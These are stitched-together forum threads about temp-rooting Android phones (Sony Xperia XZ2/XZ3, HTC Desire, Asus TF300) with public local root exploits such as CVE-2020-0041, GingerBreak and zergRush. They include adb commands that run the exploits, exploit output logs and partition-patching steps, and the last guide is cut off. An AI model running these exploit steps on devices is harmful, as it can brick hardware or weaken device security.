temp root exploit for sony xperia XZ2/XZ2c/XZ2p/XZ3 with android 10 firmwareGet a root shell with still locked bootloader.
The main thread is located in xz2 forum section here.
j4nn said:
temp root exploit for sony xperia XZ2/XZ2c/XZ2p/XZ3 with android 10 firmware
Get a root shell with still locked bootloader.
The main thread is located in xz2 forum section here.
Click to expand...
Click to collapse
Great news! I just bought a used XZ2c without knowing your latest success. This is a very pleasant surprise!
Warning: "H8314_Proximus (Vfe) BE_1313-6147_52.1.A.0.618_R1C" is the last firmware available via XperiFirm that is a target for the exploit. Other firmware versions must be searched elsewhere. I downloaded this one before it is to late.
@SGH-i200, I can upload also H8314_Customized FR_1313-2468_52.1.A.0.618_R4C if you like. Or any other mentioned in the main thread.
implemented magisk setup from temproot
finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip - get it here
j4nn said:
finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip - get it here
Click to expand...
Click to collapse
Did it actually work, I am facing issue while accessing `/data/local/tmp` directory using adb
Code:
127|H8324:/data $ ls
ls
ls: .: Permission denied
1|H8324:/data $ ls -al
---------- Post added at 06:38 PM ---------- Previous post was at 06:27 PM ----------
ahzam said:
Did it actually work, I am facing issue while accessing `/data/local/tmp` directory using adb
Code:
127|H8324:/data $ ls
ls
ls: .: Permission denied
1|H8324:/data $ ls -al
Click to expand...
Click to collapse
I was able to copy the zip files from within the adb shell after copying the files to /sdcard/tmp location and then accessing /data/local/tmp
@ahzam, that's normal behaviour of standard adb shell user. You just need to 'adb push the-files /data/local/tmp' and within 'adb shell' just 'cd /data/local/tmp'.
j4nn said:
@ahzam, that's normal behaviour of standard adb shell user. You just need to 'adb push the-files /data/local/tmp' and within 'adb shell' just 'cd /data/local/tmp'.
Click to expand...
Click to collapse
Thanks, now the root is done, but it goes off with reboots, and trick to keep this on after reboot?
I was not able to install Xposed, and not able to run the rootcloak as well. This root is of little use I guess.
@ahzam, hey, this is a temp root, so it is obvious you lose it with reboot.
Normally only adb shell is provided with an exploit. I have implemented a working start of magisk from the exploit including asking for su permission from apps.
That allows great use of the temp root vs plain temp root shell.
Not only that you may backup locked TA for eventual restore of drm keys.
You can permanently modify oem partition for debloat or ims support.
Or you can use backup apps that require root.
Or iptables based firewall is great too you know.
There may be many other working use cases, like ads removal, if implemented properly (system less-ly), not tested though.
Do you think that's little use? If someone is not allowed to BL unlock (or does not want to) it looks like it actually is something!
Is there any way I can get the customized de h8324 Image or knows how I could get it?
Sent from my iPhone using Tapatalk
If you can find it somewhere...
You may download H8324_Customized FR_1313-2469_52.1.A.0.618_R2C.zip and skip flashing oem*.sin if you are running a Customized DE android 10 fw already.
I can upload following versions:
H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C
H8166_Customized FR_1313-2540_52.1.A.0.618_R4C
H8216_Customized UK_1313-4679_52.1.A.0.618_R5C
H8266_Customized FR_1313-2481_52.1.A.0.618_R4C
H8296_Customized TW_1313-6119_52.1.A.0.618_R4C
H8314_Customized FR_1313-2468_52.1.A.0.618_R4C
H8324_Customized FR_1313-2469_52.1.A.0.618_R2C
H8416_Customized IBE_1316-6423_52.1.A.0.618_R5C
H9436_Customized FR_1316-3076_52.1.A.0.618_R6C
H9493_Customized HK_1316-2331_52.1.A.0.532_R2C
Can I flash a oem from a newer android 10 version?
Sent from my iPhone using Tapatalk
j4nn said:
@ahzam, hey, this is a temp root, so it is obvious you lose it with reboot.
Normally only adb shell is provided with an exploit. I have implemented a working start of magisk from the exploit including asking for su permission from apps.
That allows great use of the temp root vs plain temp root shell.
Not only that you may backup locked TA for eventual restore of drm keys.
You can permanently modify oem partition for debloat or ims support.
Or you can use backup apps that require root.
Or iptables based firewall is great too you know.
There may be many other working use cases, like ads removal, if implemented properly (system less-ly), not tested though.
Do you think that's little use? If someone is not allowed to BL unlock (or does not want to) it looks like it actually is something!
Click to expand...
Click to collapse
Thank you @j4nn, looking for some more information, is there a way to run these scrips phone directly? I started using the firewall, but I had to connect to ADB to regain root.
I have been using some banking application, which after detecting root do not work, and that happens with this temp-root as well, is there a way to hide the root from these app. I tried to install rootcloak, but that didn't work. And final question, I have is how do I move an application Android Firewall for example to permanent app with root access if there is a way to do so.
I appreciate your help!!
@ahzam, that's right, the exploit needs to be run from adb. It would need to be extended to allow privilege escalation from an untrusted app context, i.e. to run it from a normal app / terminal emulator on the phone without use of adb. As it is temproot, you need to start it after each reboot.
Cannot help you with hiding, did not test that.
But I would assume magiskhide could eventually work. If it did not for some app, it may help to restart (and data erase) such app. Due to magisk started late from exploit instead of during boot, some modules may get started too late and therefore look like not working - restarting involved apps/services could help.
When an app asks for root, there is an option if it should be allowed once or permanently. Just select what you need. If you want to change that decision later, you can do that in magisk manager.
magiskpolicy is inaccessible or not found
Hi @j4nn! Thanks for giving me hope using my old H8324 XZ2c dual in a new way with temp root!
I followed your instructions and all worked so far. But now I´m stuck at the point where I want wo activate temp root and start magisk.
The command "./tama-mroot" works as expected but at the next step "./magisk-start.sh -1" I always get the error that the magiskpolicy is inaccessible or not found.
"root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1
+ FRESH=false
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
./magisk-start.sh[33]: ./magiskpolicy: inaccessible or not found"
Maybe it´s easy to solve or I do something wrong but I´m a newbie at this and don´t find a mistake.
Do you have an idea what´s the problem?
Thanks in advance for your answer!
Also thanks @ferluna18 for the perfect guide to downgrade my XZ2c with locked bootloader to a FW that works with the temp root.
@Dom195, have you run the prepare step, with the unzip and magisk-setup.sh? That should make magiskpolicy available.
@j4nn Yes, I did it.
But when I typed "chmod 755 tama-mroot magisk-setup.sh magisk-start.sh" in the adb shell I got no reaction. Unfortunately my skill are far too low to understand what this command exactly is for. But in another comment I saw in the code that there also was no reaction. Therefore I didn´t see a problem with that. I looked at it once again, compared it with my cmd and on my phone it doesn´t seem to unzip the magisk-v20.4.zip file.
I just did it again. Do you see any mistake here?:
"D:\Downloads>adb push tama-mroot.zip Magisk-v20.4.zip /data/local/tmp
tama-mroot.zip: 1 file pushed, 0 skipped. 0.3 MB/s (21355 bytes in 0.064s)
Magisk-v20.4.zip: 1 file pushed, 0 ski...d. 24.9 MB/s (5942417 bytes in 0.228s)
2 files pushed, 0 skipped. 18.2 MB/s (5963772 bytes in 0.313s)
D:\Downloads>adb shell
H8324:/ $ cd /data/local/tmp
H8324:/data/local/tmp $ unzip tama-mroot.zip
Archive: tama-mroot.zip
replace magisk-start.sh? [y]es, [n]o, [A]ll, [N]one: y
inflating: magisk-start.sh
replace magisk-setup.sh? [y]es, [n]o, [A]ll, [N]one: y
inflating: magisk-setup.sh
replace tama-mroot? [y]es, [n]o, [A]ll, [N]one: y
inflating: tama-mroot
H8324:/data/local/tmp $ chmod 755 tama-mroot magisk-setup.sh magisk-start.sh
H8324:/data/local/tmp $ ./magisk-setup.sh
+ '[' '' '=' --cleanup ']'
+ ZIPFILE=Magisk-v20.4.zip
+ '[' ! -d magisk ']'
H8324:/data/local/tmp $ ls
Magisk-v20.4.zip magisk-setup.sh magisk-v20.4.zip tama-mroot
magisk magisk-start.sh magiskpolicy tama-mroot.zip
H8324:/data/local/tmp $ "
Thanks in advance!
@Dom195, it looks ok, so continue with next steps...
@j4nn: I continued and again got the info that magiskpolicy is inaccessible or not found when using command "./magisk-start.sh -1". See attached:
"D:\Downloads>adb devices
List of devices attached
BH900A5ZBZ device
D:\Downloads>adb shell
H8324:/ $ cd data/local/tmp
H8324:/data/local/tmp $ ls
Magisk-v20.4.zip magisk-setup.sh magisk-v20.4.zip tama-mroot
magisk magisk-start.sh magiskpolicy tama-mroot.zip
H8324:/data/local/tmp $ ./tama-mroot
[+] Detected H8324-52.1.A.0.618 target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffd1a9589f00
[+] file epitem at ffffffd1c9535e80
[+] Reallocating content of 'write8_inode' with controlled data......[DONE]
[+] Overwriting 0xffffffd1a9589f20 with 0xffffffd1c9535ed0...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff9a6621ebf8
[+] kernel base: ffffff9a65080000
[+] Reallocating content of 'write8_selinux' with controlled data........[DONE]
[+] Overwriting 0xffffff9a6748f000 with 0x0...[DONE]
[+] init_cred: ffffff9a6722fcd0
[+] memstart_addr: 0xffffffef40000000
[+] First level entry: 13093e003 -> next table at ffffffd1f093e000
[+] Second level entry: 12f2ab003 -> next table at ffffffd1ef2ab000
[+] sysctl_table_root = ffffff9a6725c710
[+] Reallocating content of 'write8_sysctl' with controlled data..............[D
ONE]
[+] Overwriting 0xffffffd2316ae468 with 0xffffffd1da891000...[DONE]
[+] Injected sysctl node!
[+] Node write8_inode, pid 30891, kaddr ffffffd20b528900
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 30971, kaddr ffffffd1c5da4e00
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 31023, kaddr ffffffd1a16d3180
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffd1a9589f20
[+] epitem.prev = ffffffd1a9589fd8
[+] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1
+ FRESH=false
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ FRESH=true
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
./magisk-start.sh[33]: ./magiskpolicy: inaccessible or not found
127|root_by_cve-2020-0041:/data/local/tmp #"
Do you see an error here which I don´t see?
@Dom195, hmm, that's strange, looks good to me.
Could you please try it again and when you get a root shell running the exploit, try following before starting magisk-setup.sh:
Code:
pwd
ls -lZ ./magiskpolicy
ls -lZ ./magisk/magiskinit64
id
id -Z
groups
cat ./magiskpolicy > /dev/null
cat ./magisk/magiskinit64 > /dev/null
Related
Hi can someone explain to me in nice and easy terms how to downgrade from this user guide please as I have seen a few people asking so it would help them too.
http://forum.xda-developers.com/showthread.php?t=905003
Section 2b [For Gingerbread ROMs, 2.x]
Connect Desire HD to a computer. Charge only, USB Debugging enabled!
Open up a cmd and go to Downgrade folder, execute commands:
Right this is where I get stuck what exactly do you put in the command line in cmd? is the Downgrade folder the PD98IMG.zip file you put on your SD card or what do you actually type?
The PD98IMG.zip file is on my K: drive on the SD card if that's relevant in anyway.
and then after obviously I could then follow on with the next steps of the rest being the following
execute commands:
Code:
adb push misc_version /data/local/tmp
adb push GingerBreak /data/local/tmp
adb shell chmod 777 /data/local/tmp/misc_version
adb shell chmod 777 /data/local/tmp/GingerBreak
adb shell
./data/local/tmp/GingerBreak
Section 3
If you got "#" in the result, you have temporary root! Proceed with commands:
Code:
cd /data/local/tmp
./misc_version -s 1.31.405.6
Close the CMD. Reboot while holding volume down, it will go to the bootloader
Follow the instructions (start the update)
Hi,
Where did you put the downgrade folder? The attachment from the first post?
If you placed it directly on your C: Drive, the example would be, from within a cmd window -
Code:
cd C:\Downgrade
adb push misc_version /data/local/tmp
adb push GingerBreak /data/local/tmp
adb shell chmod 777 /data/local/tmp/misc_version
adb shell chmod 777 /data/local/tmp/GingerBreak
adb shell
./data/local/tmp/GingerBreak
Hi Andy,
From Section 1 I put the PD98IMG on my desktop and then copied it onto my SD card which is on my K: drive where my DHD is attached via USB cable.
Do I need to put the PD98IMG on my desktop in a folder called 'Downgrade' or something?
No, look at the first post again. Download the Downgrade_v2.zip file right at the bottom of the post. Extract the contents to your C:\
For the sake of ease make sure its
C:\Downgrade\<files should be in here>
andyharney said:
Hi,
Where did you put the downgrade folder? The attachment from the first post?
If you placed it directly on your C: Drive, the example would be, from within a cmd window -
Code:
cd C:\Downgrade
adb push misc_version /data/local/tmp
adb push GingerBreak /data/local/tmp
adb shell chmod 777 /data/local/tmp/misc_version
adb shell chmod 777 /data/local/tmp/GingerBreak
adb shell
./data/local/tmp/GingerBreak
Click to expand...
Click to collapse
one thing @andy.... maybe i´m talking about the same thing like you.... sometimes the languaje bothers me
maybe he can´t execute adb commands from c:/ if he don´t fixed it for the adb parameters works from all directories(supposing he use Windows)...
maybe he should to write it from this directory:
Code:
c:/cd sdk
c:/sdk/cd platform-tools
c:/sdk/platform-tools
adb push misc_version /data/local/tmp
adb push GingerBreak /data/local/tmp
adb shell chmod 777 /data/local/tmp/misc_version
adb shell chmod 777 /data/local/tmp/GingerBreak
adb shell
./data/local/tmp/GingerBreak
[
maybe i´m mistaken... i don´t have any idea about windoze lol
I'm assuming ToneyEricsson hasn't added adb to his Windows environment. I think it would be simplest to put the directory on his C:\
I know what you mean, I float between XP, archlinux, and Ubuntu. Remembering what in where can get confusing.
EDIT: /Off Topic does clicking this link make you feel better?
@toney... you have installed into your computer htc sync (for obtain drivers for "android usb debug "adb) and installed the "SDK of ANDROID into your sistem?
if not take it:
http://developer.android.com/sdk/index.html
andyharney said:
I'm assuming ToneyEricsson hasn't added adb to his Windows environment. I think it would be simplest to put the directory on his C:\
I know what you mean, I float between XP, archlinux, and Ubuntu. Remembering what in where can get confusing.
Click to expand...
Click to collapse
aaaaahhh ok ok i supossed it and
in adition...ouch! i wrote my post of avobe before read your last post, sorry..
i said the same think like you... sorry @andy
I'm using Windows 7 64bit Ultimate - I have only HTC Sync installed.
I have put the Downgrade onto C: drive and get this when running the Section 2b [For Gingerbread ROMs, 2.x] command
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user>cd C:\Downgrade
C:\Downgrade>adb push misc_version /data/local/tmp
1546 KB/s (15837 bytes in 0.010s)
C:\Downgrade>adb push GingerBreak /data/local/tmp
2054 KB/s (16830 bytes in 0.008s)
C:\Downgrade>adb shell chmod 777 /data/local/tmp/misc_version
C:\Downgrade>adb shell chmod 777 /data/local/tmp/GingerBreak
C:\Downgrade>adb shell
$ ./data/local/tmp/GingerBreak
./data/local/tmp/GingerBreak
[**] Gingerbreak/Honeybomb -- android 2.[2,3], 3.0 softbreak
[**] (C) 2010-2011 The Android Exploid Crew. All rights reserved.
[**] Kudos to jenzi, the #brownpants-party, the Open Source folks,
[**] Zynamics for ARM skills and Onkel Budi
[**] donate to [email protected] if you like
[**] Exploit may take a while!
[+] Plain Gingerbread mode!
[+] Found system: 0xafd17fd5 strcmp: 0xafd38065
[+] Found PT_DYNAMIC of size 232 (29 entries)
[+] Found GOT: 0x00014360
[+] Using device /devices/platform/goldfish_mmc.0[*] vold: 5483 GOT start: 0x00014360 GOT end: 0x000143a0[*] vold: 5483 idx: -3072 fault addr: 0x000132b4
[+] fault address in range (0x000132b4,idx=-3072)
[+] Calculated idx: -2005
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
Backup files from your SDcard to your computer and format your SDcard. Its failing to see it. Or put it in, if you removed it.
andyharney said:
Backup files from your SDcard to your computer and format your SDcard. Its failing to see it. Or put it in, if you removed it.
Click to expand...
Click to collapse
The 32GB SD card is in my DHD. I have a few SD cards here I'll format a smaller one put the PD98IMG on it and try again.
So you have seen this before?
Ok, any SDcard will do. Yes I've seen this before.
Toney, when you have your HD connected to the PC at that stage, also make sure it is in Charge mode only, not disk mode.
Done formatting an 8GB SD card and put PD98IMG on the SD card and now back in Charge only mode with USB debugging enabled.
I have now both HTC Sync and Android SDK on my pc I will try the commands again as before.
nednapalm said:
Toney, when you have your HD connected to the PC at that stage, also make sure it is in Charge mode only, not disk mode.
Click to expand...
Click to collapse
Completely forgot about that. That could be the cause.
andyharney said:
Completely forgot about that. That could be the cause.
Click to expand...
Click to collapse
caught me out once too!
Well I got HTC Sync and Android SDK installed, Charge only, USB debugging enabled and just ran the same command line as earlier and get the exact same
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user>cd C:\Downgrade
C:\Downgrade>adb push misc_version /data/local/tmp
adb server is out of date. killing...
* daemon started successfully *
1718 KB/s (15837 bytes in 0.009s)
C:\Downgrade>adb push GingerBreak /data/local/tmp
1494 KB/s (16830 bytes in 0.011s)
C:\Downgrade>adb shell chmod 777 /data/local/tmp/misc_version
C:\Downgrade>adb shell chmod 777 /data/local/tmp/GingerBreak
C:\Downgrade>adb shell
$ ./data/local/tmp/GingerBreak
./data/local/tmp/GingerBreak
[**] Gingerbreak/Honeybomb -- android 2.[2,3], 3.0 softbreak
[**] (C) 2010-2011 The Android Exploid Crew. All rights reserved.
[**] Kudos to jenzi, the #brownpants-party, the Open Source folks,
[**] Zynamics for ARM skills and Onkel Budi
[**] donate to [email protected] if you like
[**] Exploit may take a while!
[+] Plain Gingerbread mode!
[+] Found system: 0xafd17fd5 strcmp: 0xafd38065
[+] Found PT_DYNAMIC of size 232 (29 entries)
[+] Found GOT: 0x00014360
[+] Using device /devices/platform/goldfish_mmc.0
[*] vold: 1226 GOT start: 0x00014360 GOT end: 0x000143a0
[*] vold: 1226 idx: -3072 fault addr: 0x000132b4
[+] fault address in range (0x000132b4,idx=-3072)
[+] Calculated idx: -2005
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
ToneyEricsson said:
Well I got HTC Sync and Android SDK installed, Charge only, USB debugging enabled and just ran the same command line as earlier and get the exact same
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user>cd C:\Downgrade
C:\Downgrade>adb push misc_version /data/local/tmp
adb server is out of date. killing...
* daemon started successfully *
1718 KB/s (15837 bytes in 0.009s)
C:\Downgrade>adb push GingerBreak /data/local/tmp
1494 KB/s (16830 bytes in 0.011s)
C:\Downgrade>adb shell chmod 777 /data/local/tmp/misc_version
C:\Downgrade>adb shell chmod 777 /data/local/tmp/GingerBreak
C:\Downgrade>adb shell
$ ./data/local/tmp/GingerBreak
./data/local/tmp/GingerBreak
[**] Gingerbreak/Honeybomb -- android 2.[2,3], 3.0 softbreak
[**] (C) 2010-2011 The Android Exploid Crew. All rights reserved.
[**] Kudos to jenzi, the #brownpants-party, the Open Source folks,
[**] Zynamics for ARM skills and Onkel Budi
[**] donate to [email protected] if you like
[**] Exploit may take a while!
[+] Plain Gingerbread mode!
[+] Found system: 0xafd17fd5 strcmp: 0xafd38065
[+] Found PT_DYNAMIC of size 232 (29 entries)
[+] Found GOT: 0x00014360
[+] Using device /devices/platform/goldfish_mmc.0
[*] vold: 1226 GOT start: 0x00014360 GOT end: 0x000143a0
[*] vold: 1226 idx: -3072 fault addr: 0x000132b4
[+] fault address in range (0x000132b4,idx=-3072)
[+] Calculated idx: -2005
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
Click to expand...
Click to collapse
you need to enter the commands like the post 5 of this thread....
ensure you that you are leaved in platform-tools folder of the sdk the downgradev2 folder
Toney, I would also try downloading the RUU for 2.36 from XDA and flashing that to get a clean start (don't set up any accounts just skip the setup till you get to the launcher and start the process again).
nednapalm said:
Toney, I would also try downloading the RUU for 2.36 from XDA and flashing that to get a clean start (don't set up any accounts just skip the setup till you get to the launcher and start the process again).
Click to expand...
Click to collapse
I have the 2.3 RUU already downloaded but I need to downgrade to 1.32, get rooted with Visionary and and S-OFF with the tool and then after that update with 2.3 RUU.
Edit: All done, S-OFF and rooted in 2.3 with Gingerbreak.
P.S Sergie is the man! a big thanks!
Hi,
If You want to downgrade Desire Hboot 1.03, then using revolutionary to s-off, please follow the instructions .
Steps:
1. Download tools package (attached files)
2. Download this HTC Official ROM (RUU)
3. For branded phones create GoldCard.
4. Extract the tools any where at your computer.
5. Run RUU and wait to appear Android rom update utility screen.
6. Go to Temp directory on C drive on your computer and find folder that RUU extracted in it.
7. Copy the rom.zip and paste it to sdcard and rename it to PB99IMG.zip
8. Connect your phone to computer via USB as charge only and enable USB debugging and Unknown Sources.
9. Run cmd.exe on tools folder that you download and extracted it and Execute these commands:
7.
Code:
adb push flash_image /sdcard/flash_image
8.
Code:
adb push zergRush /data/local/zergRush
9.
Code:
adb shell
10.
Code:
chmod 755 /data/local/zergRush
/data/local/zergRush
Output on cmd should be like :
Code:
[**] Zerg rush - Android 2.2/2.3 local root
[**] (C) 2011 Revolutionary. All rights reserved.
[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.
[+] Found a GingerBread ! 0x00017118
Sending 149 zerglings ...[ * ] Trying a new path ...[ * ] Sending 149 zerglings ...[ * ] Trying a new path ...[ * ] Sending 149 zerglings ...[ * ] Trying a new path ...[ * ] Sending 149 zerglings ...
[+] Zerglings caused crash (good news): 0x401219c4 0x0054[ * ] Researching Metabolic Boost ...
[+] Speedlings on the go ! 0xafd260a9 0xafd39f9f[ *] Poping 24 more zerglings[ * ] Sending 173 zerglings ...
[+] Rush did it ! It's a GG, man !
[+] Killing ADB and restarting as root..enjoy!
11.
Code:
cat /dev/mtd/mtd0 > /sdcard/misc.img
12.
Code:
cat /sdcard/flash_image > /data/flash_image
13.
Code:
chmod 777 /data/flash_image
14.
Code:
exit
15.
Code:
adb pull /sdcard/misc.img misc.img
16. Now the misc.img is in your tools folder. Run HxD.exe and select OK when prompted.
17. Open misc.img in the current directory, and change line 11 which contains the version number of your current ROM. Change it by number of the future ROM you want to install(Find at Android rom update utility screen after run RUU)
Changes will appear in red. Save the file to misc0.img.
16.
Code:
adb push misc0.img /sdcard/misc0.img
17.
Code:
adb shell
/data/flash_image misc /sdcard/misc0.img
18. Reset phone and press vol-down to go to Bootloader.
19. Wait for detect and check the Update Package.
20. After checking package, press vol-up to begin update process, IN FIRST TIME AFTER PRESSING VOL-UP YOUR PHONE WILL RESET AND DO NOTHING, YOU SHOULD DO AGAIN FOR STEPS 18,19,20.
Notes
The process will flash your recovery partition back to stock
This process will wipe all the data from your phone
The downgrade installs an official stock HTC ROM with Hboot1.02 (You can s-off with revolutionary and after it You can flash any version of Hboot)
Your sdcard should be fat32 formatted
Creating a goldcard
Thanks
emveefr
IF YOU CAN NOT DOWNGRADE HBOOT,WITH THIS TUTORIAL, PLEASE READE THIS POST
Neat, I'll link this on my guide. I'm sure it'll be very useful to some.
After step 10 pc can't find phone and screen never turn off... Current rom is Stock pre-rooted Gingerbread, non-branded
mikele020794 said:
After step 10 pc can't find phone and screen never turn off... Current rom is Stock pre-rooted Gingerbread, non-branded
Click to expand...
Click to collapse
Hi, please read and do the end of post #1
netmsm said:
Hi, please read and do the end of post #1
Click to expand...
Click to collapse
Hi, after official unlocking I cant flash any stock rom =( I tried to use teppic's downgrader before...
mikele020794 said:
Hi, after official unlocking I cant flash any stock rom =( I tried to use teppic's downgrader before...
Click to expand...
Click to collapse
Hi, dont worry
Please :
1. Do full wipe
2. Do instructions in second way (bottom of the post #1, in red color)
5. Run RUU and wait to appear Android rom update utility screen.
6. Go to Temp directory on C drive on your computer and find folder that RUU extracted in it.
Can't find the file in step 6?
Kurt45 said:
5. Run RUU and wait to appear Android rom update utility screen.
6. Go to Temp directory on C drive on your computer and find folder that RUU extracted in it.
Can't find the file in step 6?
Click to expand...
Click to collapse
Hi,
On temp directory at C drive, please search "adb.exe" or "rom.zip"
bortak said:
Neat, I'll link this on my guide. I'm sure it'll be very useful to some.
Click to expand...
Click to collapse
offer, for you My friend
I have tried it on a phone with the HTC official unlock but it stop working on step 11.
Kurt45 said:
I have tried it on a phone with the HTC official unlock but it stop working on step 11.
Click to expand...
Click to collapse
Hi, Yes It might be occur for some roms and V2 post For resolving this problem.
You should do full wipe and follow steps on V2.
I tried also this, since the V2 report a virus in the zip.
But when I execute the first command I receive back this:
Code:
adb push flash_image /sdcard/flash_image
1584 KB/s (0 bytes in 76044.000s)
Is normal? why do this?
corno77 said:
I tried also this, since the V2 report a virus in the zip.
But when I execute the first command I receive back this:
Code:
adb push flash_image /sdcard/flash_image
1584 KB/s (0 bytes in 76044.000s)
Is normal? why do this?
Click to expand...
Click to collapse
Sorry.... now everything is working! using V2 solution!
corno77 said:
Sorry.... now everything is working! using V2 solution!
Click to expand...
Click to collapse
Hi my friend
Is Your problem solved ?
Issue with DOWNGRADER
" You must wait about one minute before continuing.
Press any key to continue...
* daemon not running. starting it now *
* daemon started successfully *
Testing access: FAILED - please exit and try again. "
What should I do now, should I try with the alternative tutorial ?
---------- Post added at 07:00 PM ---------- Previous post was at 06:14 PM ----------
After entering the code at step 11 it shows up:
" The system cannot find message text for message number 0x3 in the message file for System. "
Also, can't continue with the other steps without makin this one. HELP!
Hi all
after flash hboot jellybean but now can't flash stock hboot
when I want flash stock hboot error you can't back hboot
please help me
I'm trying to run this tutorial so I can downgrade hboot and then run revolutionary for root/s-off. I get stuck at step 11. Says "The system cannot find the path specified." Anyone got any idea how I could get past this?
Same here! Pls help!
Many thanks for such detailed tutorial, but I am having problems.
First of all when I click on the RUU link I am presented with a download that doesn't work and just cycles through a bunch of adverts. Fair enough, I managed to get to the real link anyway, but the file is not an RUU.EXE but it is HTC_Desire_Android_2.3_Upgrade.zip. Using this file I cannot find which rom version it is and cannot therefore patch it with the correct version in step 17, but I never got to that point.
I created apparently successfully a goldcard and used it for the rest of the procedure, hope this is ok. Steps 7 to 10 seemed to be successful also although the output was not quite like on your tutorial. I got
$ chmod 755 /data/local/zergRush
chmod 755 /data/local/zergRush
$ /data/local/zergRush
/data/local/zergRush
[**] Zerg rush - Android 2.2/2.3 local root
[**] (C) 2011 Revolutionary. All rights reserved.
[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.
[+] Found a Froyo ! 0x00000108
[*] Scooting ...
[*] Sending 149 zerglings ...
[+] Zerglings found a way to enter ! 0x10
[+] Overseer found a path ! 0x000150e8
[*] Sending 149 zerglings ...
[+] Zerglings caused crash (good news): 0x401219e4 0x006c
[*] Researching Metabolic Boost ...
[+] Speedlings on the go ! 0xafd158bf 0xafd1ace3
[*] Sending 149 zerglings ...
[+] Rush did it ! It's a GG, man !
[+] Killing ADB and restarting as root... enjoy!
The trouble started with step 11. The phone did not restart as root by itself. So I switched it off and pressed volume down and power to force it into root. Then I typed the command. This didn't work as cat is not a DOS command nor was it in the unzipped directory.
What is this cat command? How am I supposed to use it? I AM STUCK, HELP PLEASE.
marco_bruzzone said:
Many thanks for such detailed tutorial, but I am having problems.
First of all when I click on the RUU link I am presented with a download that doesn't work and just cycles through a bunch of adverts. Fair enough, I managed to get to the real link anyway, but the file is not an RUU.EXE but it is HTC_Desire_Android_2.3_Upgrade.zip. Using this file I cannot find which rom version it is and cannot therefore patch it with the correct version in step 17, but I never got to that point.
I created apparently successfully a goldcard and used it for the rest of the procedure, hope this is ok. Steps 7 to 10 seemed to be successful also although the output was not quite like on your tutorial. I got
$ chmod 755 /data/local/zergRush
chmod 755 /data/local/zergRush
$ /data/local/zergRush
/data/local/zergRush
[**] Zerg rush - Android 2.2/2.3 local root
[**] (C) 2011 Revolutionary. All rights reserved.
[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.
[+] Found a Froyo ! 0x00000108
[*] Scooting ...
[*] Sending 149 zerglings ...
[+] Zerglings found a way to enter ! 0x10
[+] Overseer found a path ! 0x000150e8
[*] Sending 149 zerglings ...
[+] Zerglings caused crash (good news): 0x401219e4 0x006c
[*] Researching Metabolic Boost ...
[+] Speedlings on the go ! 0xafd158bf 0xafd1ace3
[*] Sending 149 zerglings ...
[+] Rush did it ! It's a GG, man !
[+] Killing ADB and restarting as root... enjoy!
The trouble started with step 11. The phone did not restart as root by itself. So I switched it off and pressed volume down and power to force it into root. Then I typed the command. This didn't work as cat is not a DOS command nor was it in the unzipped directory.
What is this cat command? How am I supposed to use it? I AM STUCK, HELP PLEASE.
Click to expand...
Click to collapse
Why don't you extract the zip and check if there is an ruu inside it then run it to update to gb and it should change hboot?
Sent from my HTC Desire S using XDA Free mobile app
Hello,
I managed to root my TF300 this week-end.
Since the method of downgrading to .17, getting root, then waiting for Asus to update it again OTA to .29... was not really satisfying to me, I found a simpler (and hopefully safer) way to do it.
Story short: instead of getting write access to mmcblk0p4 to write a blob (as in method #2 of http://forum.xda-developers.com/showthread.php?t=1622628), I'm getting write access to mmcblk0p1 to write a single file, with suid perms.
Here is the full guide, and the link to the binaries at the end.
Please be sure to read it until the end, and to understand every line of it. I thus encourage you to read the debugfs manpage here: http://linux.die.net/man/8/debugfs
Of course, there is no garantee for this to work or to not brick your device, especially if you don't understand what you type, so RTFM twice.
Here is now the full guide:
Rooting the Asus Transformer TF300T
===================================
: first, use known method to get write access to the /system partition
Code:
adb push debugfs /data/local/
adb push su /data/local/
adb shell
Code:
$ cd /data/local/
$ mv tmp tmp.back
FOR TRANSFORMER (TF101 TF201 TF300T TF700T) ONLY:
Code:
$ ln -s /dev/block/mmcblk0[COLOR="Red"]p1[/COLOR] tmp
$ exit
FOR PADFONE ONLY:
Code:
$ ln -s /dev/block/mmcblk0[COLOR="Red"]p21[/COLOR] tmp
$ exit
FOR SAMSUNG GALAXY SII ONLY:
Code:
$ ln -s /dev/block/mmcblk0[COLOR="Red"]p9[/COLOR] tmp
$ exit
